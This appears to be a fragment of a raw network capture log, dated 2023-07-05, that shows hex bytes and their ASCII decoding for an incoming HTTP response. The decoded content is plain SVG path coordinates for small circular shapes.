                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10587INData Raw: 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: 2,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10603INData Raw: 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                                          Data Ascii: 1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10619INData Raw: 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10635INData Raw: 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 39 2e 39 31 2c 34 34 33 2e 39 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M889.91,443.93a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10651INData Raw: 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2c 32 36 31 2e 38 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M918,261.89a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10667INData Raw: 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 37 32 2c 33 32 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,3.62.19,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M952.72,323a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10683INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 38 37 2c 32 36 30 2e 34 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d
                                                                                                                                                                                                                                                                          Data Ascii: class="cls-7" d="M59.87,260.41a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10699INData Raw: 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2e 33 33 2c 33 31 31 2e 38 37 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e
                                                                                                                                                                                                                                                                          Data Ascii: 1,3.66.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M97.33,311.87a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10715INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 38 35 2c 31 32 36 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                                          Data Ascii: <path class="cls-7" d="M117.85,126.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.6
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10731INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 36 31 2c 31 38 36 2e 38 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.61,186.86a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10747INData Raw: 33 37 2c 32 34 37 2e 31 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 37,247.1a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10763INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 31 2e 31 32 2c 33 30 37 2e 33 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e
                                                                                                                                                                                                                                                                          Data Ascii: ,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M231.12,307.35a2.16,2.16,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10779INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 36 34 2c 31 32 32 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M251.64,122.08a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10795INData Raw: 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 34 2c 31 38 32 2e 33 33 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39
                                                                                                                                                                                                                                                                          Data Ascii: 7,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M289.4,182.33a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10811INData Raw: 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 37 2e 31 36 2c 32 34 32 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: .87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M327.16,242.57a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10827INData Raw: 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 39 31 2c 33 30 32 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: ,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M364.91,302.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC10843INData Raw: 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                                          Data Ascii: .93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><pa
